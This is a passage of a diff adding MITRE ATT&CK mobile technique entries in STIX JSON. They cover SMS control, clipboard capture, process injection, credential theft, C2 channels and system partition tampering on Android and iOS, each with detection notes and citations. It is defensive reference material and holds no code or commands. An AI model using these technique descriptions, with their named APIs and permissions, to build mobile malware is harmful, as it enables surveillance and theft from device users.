"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:58:57.001Z", + "name": "SMS Control", + "description": "Adversaries may delete, alter, or send SMS messages without user authorization. 
This could be used to hide C2 SMS messages, spread malware, or various external effects.\n\nThis can be accomplished by requesting the `RECEIVE_SMS` or `SEND_SMS` permissions depending on what the malware is attempting to do. If the app is set as the default SMS handler on the device, the `SMS_DELIVER` broadcast intent can be registered, which allows the app to write to the SMS content provider. The content provider directly modifies the messaging database on the device, which could allow malicious applications with this ability to insert, modify, or delete arbitrary messages on the device.(Citation: SMS KitKat)(Citation: Android SmsProvider)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view the default SMS handler in system settings.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "created": "2020-09-11T15:14:33.730Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1582", + "external_id": "T1582" + }, + { + "source_name": "Android SmsProvider", + "description": "Google. (n.d.). SmsProvider.java. Retrieved September 11, 2020.", + "url": "https://android.googlesource.com/platform/packages/providers/TelephonyProvider/+/7e7c274/src/com/android/providers/telephony/SmsProvider.java" + }, + { + "source_name": "SMS KitKat", + "description": "S.Main, D. Braun. (2013, October 14). Getting Your SMS Apps Ready for KitKat. 
Retrieved September 11, 2020.", + "url": "https://android-developers.googleblog.com/2013/10/getting-your-sms-apps-ready-for-kitkat.html" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-16.html", + "external_id": "APP-16" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-41.html", + "external_id": "CEL-41" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--b332a960-3c04-495a-827f-f17a5daed3a6", + "created": "2017-10-25T14:48:14.003Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1408", + "url": "https://attack.mitre.org/techniques/T1408" + }, + { + "source_name": "Brodie", + "url": "https://media.blackhat.com/eu-13/briefings/Brodie/bh-eu-13-lacoon-attacks-mdm-brodie-wp.pdf", + "description": "Daniel Brodie. (2016). Practical Attacks against Mobile Device Management (MDM). Retrieved December 21, 2016." + }, + { + "source_name": "Rastogi", + "url": "http://pages.cs.wisc.edu/~vrastogi/static/papers/rcj13b.pdf", + "description": "Vaibhav Rastogi, Yan Chen, and Xuxian Jiang. (2013, May). DroidChameleon: Evaluating Android Anti-malware against Transformation Attacks. Retrieved December 9, 2016." + }, + { + "source_name": "Tan", + "url": "http://www.blackhat.com/us-16/briefings.html#bad-for-enterprise-attacking-byod-enterprise-mobile-security-solutions", + "description": "Vincent Tan. (2016, August). 
BAD FOR ENTERPRISE: ATTACKING BYOD ENTERPRISE MOBILE SECURITY SOLUTIONS. Retrieved February 4, 2017." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-5.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "EMM-5" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could use knowledge of the techniques used by security software to evade detection(Citation: Brodie)(Citation: Tan). For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed \"su\" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection(Citation: Rastogi).", + "modified": "2022-04-08T16:29:55.321Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Disguise Root/Jailbreak Indicators", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--b3c2e5de-0941-4b57-ba61-af029eb5517a", + "created": "2017-10-25T14:48:27.307Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1438", + "url": "https://attack.mitre.org/techniques/T1438" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": 
"APP-30" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a standard Internet connection, the exfiltration may occur, for example, via Bluetooth, or another radio frequency (RF) channel. \n\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network. ", + "modified": "2022-04-18T19:46:02.529Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exfiltration Over Other Network Medium", + "x_mitre_detection": "Exfiltration over other network mediums can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--b765efd1-02e6-4e67-aebf-0fef5c37e54b", + "type": "attack-pattern", + "created": "2017-10-25T14:48:26.473Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1440", + "external_id": "T1440" + } + ], + "modified": "2018-10-17T01:05:10.700Z", + "name": "Detect App Analysis Environment", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:55:54.442Z", + "name": "Process Injection", + "description": "Adversaries may inject code into processes in order to 
evade process-based defenses or even elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nBoth Android and iOS have no legitimate way to achieve process injection. The only way this is possible is by abusing existing root access or exploiting a vulnerability.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for misuse of dynamic libraries.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--b7c0e45f-0206-4f75-96e7-fe7edad3aaff", + "created": "2022-03-30T18:50:43.393Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1631", + "external_id": "T1631" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--b928b94a-4966-4e2a-9e61-36505b896ebc", + "type": "attack-pattern", + "created": "2017-10-25T14:48:24.905Z", + "revoked": true, + 
"external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1462", + "external_id": "T1462" + } + ], + "modified": "2018-10-17T01:05:10.704Z", + "name": "Malicious Software Development Tools", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "created": "2022-04-05T20:14:17.310Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1521.001", + "url": "https://attack.mitre.org/techniques/T1521/001" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. 
Common symmetric encryption algorithms include AES, Blowfish, and RC4.", + "modified": "2022-04-05T20:14:17.310Z", + "name": "Symmetric Cryptography", + "x_mitre_detection": "Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--bd4d32f5-eed4-4018-a649-40b229dd1d69", + "created": "2017-10-25T14:48:30.127Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1402", + "url": "https://attack.mitre.org/techniques/T1402" + }, + { + "source_name": "Android Changes to System Broadcasts", + "url": "https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts", + "description": "Google. (2019, December 27). Broadcasts Overview. Retrieved January 27, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An intent is a message passed between Android application or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. 
Malicious applications can then trigger certain actions within the app based on which broadcast intent was received.\n\nFurther, malicious applications can register for intents broadcasted by other applications in addition to the Android system itself. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting of specific devices, users, or applications.\n\nIn Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts)", + "modified": "2022-03-30T14:43:46.019Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Broadcast Receivers", + "x_mitre_detection": "Broadcast intent receivers are part of standard OS-level APIs and are therefore typically undetectable to the end user.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:21:12.603Z", + "name": "Compromise Hardware Supply Chain", + "description": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. 
By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Integrity checking mechanisms can potentially detect unauthorized hardware modifications.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--c08366bb-8d11-4921-853f-f0a3b6a2a1da", + "created": "2022-03-28T19:30:15.556Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1474/002", + "external_id": "T1474.002" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-1.html", + "external_id": "SPC-1" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-2.html", + "external_id": "SPC-2" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-4.html", + "external_id": "SPC-4" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-5.html", + "external_id": "SPC-5" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-6.html", + "external_id": "SPC-6" + }, + { + "source_name": "NIST Mobile Threat 
Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-7.html", + "external_id": "SPC-7" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-8.html", + "external_id": "SPC-8" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-13.html", + "external_id": "SPC-13" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-16.html", + "external_id": "SPC-16" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-17.html", + "external_id": "SPC-17" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-21.html", + "external_id": "SPC-21" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-16T18:33:20.042Z", + "name": "Clipboard Data", + "description": "Adversaries may abuse clipboard manager APIs to obtain sensitive information copied to the device clipboard. For example, passwords being copied and pasted from a password manager application could be captured by a malicious application installed on the device.(Citation: Fahl-Clipboard) \n\n \n\nOn Android, applications can use the `ClipboardManager.OnPrimaryClipChangedListener()` API to register as a listener and monitor the clipboard for changes. 
However, starting in Android 10, this can only be used if the application is in the foreground, or is set as the device’s default input method editor (IME).(Citation: Github Capture Clipboard 2019)(Citation: Android 10 Privacy Changes) \n\n \n\nOn iOS, this can be accomplished by accessing the `UIPasteboard.general.string` field. However, starting in iOS 14, upon accessing the clipboard, the user will be shown a system notification if the accessed text originated in a different application. For example, if the user copies the text of an iMessage from the Messages application, the notification will read “application_name has pasted from Messages” when the text was pasted in a different application.(Citation: UIPPasteboard)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could detect usage of standard clipboard APIs.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "3.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--c4b96c0b-cb58-497a-a1c2-bb447d79d692", + "created": "2017-10-25T14:48:19.996Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1414", + "external_id": "T1414" + }, + { + "source_name": "Android 10 Privacy Changes", + "description": "Android Developers. (n.d.). Privacy changes in Android 10. Retrieved September 11, 2019.", + "url": "https://developer.android.com/about/versions/10/privacy/changes#clipboard-data" + }, + { + "source_name": "UIPPasteboard", + "description": "Apple Developer. (n.d.). 
UIPasteboard. Retrieved April 1, 2022.", + "url": "https://developer.apple.com/documentation/uikit/uipasteboard" + }, + { + "source_name": "Fahl-Clipboard", + "description": "Fahl, S, et al.. (2013). Hey, You, Get Off of My Clipboard. Retrieved August 27, 2019.", + "url": "http://saschafahl.de/static/paper/pwmanagers2013.pdf" + }, + { + "source_name": "Github Capture Clipboard 2019", + "description": "Pearce, G. (, January). Retrieved August 8, 2019.", + "url": "https://github.com/grepx/android-clipboard-security" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-35.html", + "external_id": "APP-35" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--c5089859-b21f-40a3-8be4-63e381b8b1c0", + "created": "2017-10-25T14:48:30.890Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1400", + "url": "https://attack.mitre.org/techniques/T1400" + }, + { + "source_name": "Android-VerifiedBoot", + "url": "https://source.android.com/security/verifiedboot/", + "description": "Android. (n.d.). Verified Boot. Retrieved December 21, 2016." + }, + { + "source_name": "Apple-iOSSecurityGuide", + "url": "https://www.apple.com/business/docs/iOS_Security_Guide.pdf", + "description": "Apple. (2016, May). iOS Security. Retrieved December 21, 2016." 
+ }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-27" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device system partition, where it may persist after device resets and may not be easily removed by the device user.\n\nMany Android devices provide the ability to unlock the bootloader for development purposes. An unlocked bootloader may provide the ability for an adversary to modify the system partition. Even if the bootloader is locked, it may be possible for an adversary to escalate privileges and then modify the system partition.", + "modified": "2022-03-30T15:18:21.242Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Modify System Partition", + "x_mitre_detection": "Android devices with the Verified Boot capability (Citation: Android-VerifiedBoot) perform cryptographic checks of the integrity of the system partition.\n\nThe Android SafetyNet API's remote attestation capability could potentially be used to identify and respond to compromised devices.\n\nSamsung KNOX also provides a remote attestation capability on supported Samsung Android devices.\n\niOS devices will fail to boot or fail to allow device activation if unauthorized modifications are detected.(Citation: Apple-iOSSecurityGuide)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:55:32.497Z", + "name": "Data Manipulation", + "description": "Adversaries may insert, delete, or alter data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nThe type of modification and the impact it will have depends on the target application, process, and the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system, typically gained through a prolonged information gathering campaign, in order to have the desired impact.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for use of standard APIs (e.g. 
the clipboard API) that could indicate data manipulation is occurring.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--c548d8c4-a0a3-4a24-bb79-2a84abbc7b36", + "created": "2022-04-06T13:34:46.021Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1641", + "external_id": "T1641" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:58:33.873Z", + "name": "SMS Messages", + "description": "Adversaries may utilize standard operating system APIs to gather SMS messages. On Android, this can be accomplished using the SMS Content Provider. iOS provides no standard API to access SMS messages. \n\nIf the device has been jailbroken or rooted, an adversary may be able to access [SMS Messages](https://attack.mitre.org/techniques/T1636/004) without the user’s knowledge or approval. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, the user can manage which applications have permission to access SMS messages through the device settings screen, revoking the permission if necessary. Application vetting services could look for `android.permission.READ_SMS` in an Android application’s manifest. Most applications do not need access to SMS messages, so extra scrutiny could be applied to those that request it. 
", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "created": "2022-04-01T13:25:30.923Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636/004", + "external_id": "T1636.004" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:37:13.730Z", + "name": "Web Service", + "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. \n\n \n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis, or enable operational resiliency (since this infrastructure may be dynamically changed). 
\n\n ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--c6a146ae-9c63-4606-97ff-e261e76e8380", + "created": "2019-02-01T17:29:43.503Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1481", + "external_id": "T1481" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:46:08.412Z", + "name": "System Runtime API Hijacking", + "description": "Adversaries may execute their own malicious payloads by hijacking the way an operating system run applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur at later points in time. \n\n\nOn Android, adversaries may overwrite the standard OS API library with a malicious alternative to hook into core functions to achieve persistence. 
By doing this, the adversary’s code will be executed every time the overwritten API function is called by an app on the infected device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile threat defense agents could detect unauthorized operating system modifications by using attestation. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "created": "2022-03-30T15:07:51.646Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1625/001", + "external_id": "T1625.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "external_id": "APP-27" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--c91c304a-975d-4501-9789-0db1c57afd3f", + "type": "attack-pattern", + "created": "2017-10-25T14:48:07.149Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1455", + "external_id": "T1455" + } + ], + "modified": "2018-10-17T01:05:10.702Z", + "name": "Exploit Baseband Vulnerability", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T15:45:44.103Z", + "name": "Credentials from 
Password Store", + "description": "Adversaries may search common password storage locations to obtain user credentials. Passwords can be stored in several places on a device, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can potentially detect jailbroken devices. Application vetting services may be able to detect known privilege escalation exploits contained within applications, as well as searching application packages for strings that correlate to known password store locations.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "created": "2022-04-01T14:55:10.494Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + 